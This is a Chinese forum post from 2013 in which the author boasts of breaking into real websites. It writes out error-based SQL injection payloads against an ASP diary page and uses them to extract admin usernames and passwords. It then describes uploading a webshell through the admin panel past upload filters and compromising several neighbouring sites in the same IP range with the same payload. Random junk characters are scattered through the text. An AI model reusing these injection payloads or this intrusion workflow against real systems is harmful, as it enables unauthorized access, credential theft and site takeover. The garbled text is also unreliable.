发现一个注入点0 s# B H5 ]) V% R8 `! ^7 K
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
. w6 P8 R) Q! b; X7 J4 S" x# z9 D. Q: y+ q/ x1 i; D% U) f
习惯性的加’having1=1--% P- j( |2 w( F, z
0 v- b" J" J. P) _3 e& `http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—" Q7 M* y0 H2 ^+ I( G) x2 {
" I, |* _% s. M' ~
0
9 T3 a9 _) b2 Y4 I5 G8 H2 u6 Y/ u0 p4 H, c$ l6 V" r- c+ B
爆出Diary_A.dl_Title(这时候很激动啊)
9 }$ e+ c. u! k/ b! d# U/ n4 G2 x* a+ m! d& R& o2 B5 i' K. ~
那么继续
0 I8 l! F- o% h& T* shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—, q1 Q3 c# X; T M# f5 z; N. c. j/ m
9 |0 ~! k3 o! w继续,一直爆下去
" Y( `' K7 n6 j% F( V' ^
m5 O5 B. c, N$ v. P u爆到几个字段和表段 但是没找到需要的管理用户的字段) B2 F; |0 I- `3 R) i
; r3 o* m$ ]2 [
蛋疼了 怎么办 然后去后台登陆页看源码
' b9 P$ D$ B9 V* ?- }7 z3 T0 K; r9 e3 _
3 n7 v5 {: S! o1 U; j0$ z m/ ?2 Q `* X# B
# i& ?# Q/ Z0 F( H5 A% Q6 ^3 ?" F3 SInput name= “ADUID”
* i" D0 A6 h7 Q! XInput name= “ADPWD”; O& L0 B0 T% W
0 I" C+ n. I: t9 _1 D+ ~2 [4 A
很幸运 找到了字段那就继续0 d' G9 y! v6 C9 {
找到之后开始爆用户7 Y( ~6 o- E+ J2 v& c
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
5 c# Q, a2 v, M8 x( T爆密码
+ ^( m% w' O* _; N3 shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
0 K8 V" J0 i+ m5 Z测试了下 这个注入点只能爆到文章哪里的表
: n0 J( G8 B; _
4 P' x/ z( Z0 V! ]; e头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了+ [, K a) ?6 B% @6 ^) G. x) f: L
, \: I3 E6 ~! [3 m* i5 u. W" G$ t8 A) y
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了2 O9 ~" o$ t6 T8 q+ i6 K5 U: ~
4 {( S. D- ~1 e6 g* Z: E: O6 }
473! {* M5 L. I# y" s
! t' A7 N k2 [; C. ~) k% C
进后台
5 `! [9 e- v" c
: l* t& `2 _, ~: P- u
3 q3 }2 Z" {5 `- ]! L发现几个上传点 有的地方不能上传 而且防止恶意代码+ n% C1 P; Z! {+ i1 Q- G/ U; W
+ d* H$ |5 R- r" T& y( p* P没办法 各种百度各种找大牛 找到一只好像可以突破的马
# s3 o& P; @1 ~0 e1 N, m4 M6 l- o/ H; y9 B
8 J5 N2 l0 c( c& c' f在系统管理那里直接上传 不过没有显示地址3 t6 K, w& W% e: b6 K4 w: f
- ^, [! c2 }, _/ L3 @再上传一次 抓包 搞定OK9 q# r+ o) B$ O. [2 x& P$ F
" w" ~4 V3 `/ y. G. s
2 q' Y; B1 E3 b ?" y1 B3 @& v' A E1 ?; m" X
4720 Q5 g' m9 X2 P$ L- C, f6 v
+ \4 A( ~% D* K' Q4 [; ^1 Y0 X
晚上不行了 去睡觉。。。+ o, ~! w" `9 b1 ^
第二天刚起床 闲的没事做继续日站吧
# A) Z0 L8 J) G1 I" T
4 |5 Q, l" V$ U) s找个站 就把这个站的旁c扫了下
1 R) a- C P& g% `# {! u. N0 g* {6 K, l
发现c段也有一个购物站 ,然后还和这个站的模板差不多# P. a+ ] s h- }" h& [
& }# l/ ~; _5 ^. y+ `! O$ I就找到会员登录口测试
/ S, W4 d" E' c; L4 Y+ T- A5 `3 s+ P7 r3 _5 }
'and (select top 1 MGR_UID from A_MGR)>0—8 c% [% p" s$ @' d3 _: [
果断爆到了 这时候我很激动 通杀9 c' U* z+ G! D
6 D+ |# O" J5 j$ [9 M再次翻c段& V( N3 v1 c* ]0 f* [5 l% i, h
* t. P: Y$ G k
翻出几个站 都成功拿下
" u( R" G) C; }' y: m! u/ r
# K# h; ~; I7 J6 ? _# ?
/ U! O5 [( K& ^' K9 Y: @& G, p1 \# {2 L5 H) X& _2 Z
修复方案:9 ~' q- n. F; _" \/ {! p
他们比我专业 ( C0 P J/ C1 @/ d' X
- x# s8 \0 }* M! ]8 n- ~9 T" h
1 Z% t4 I! Y* S( c: W/ i
6 K2 N# P _9 ^4 w, T; n( b s
|
发表于 2013-4-4 17:40:38
收藏
支持
反对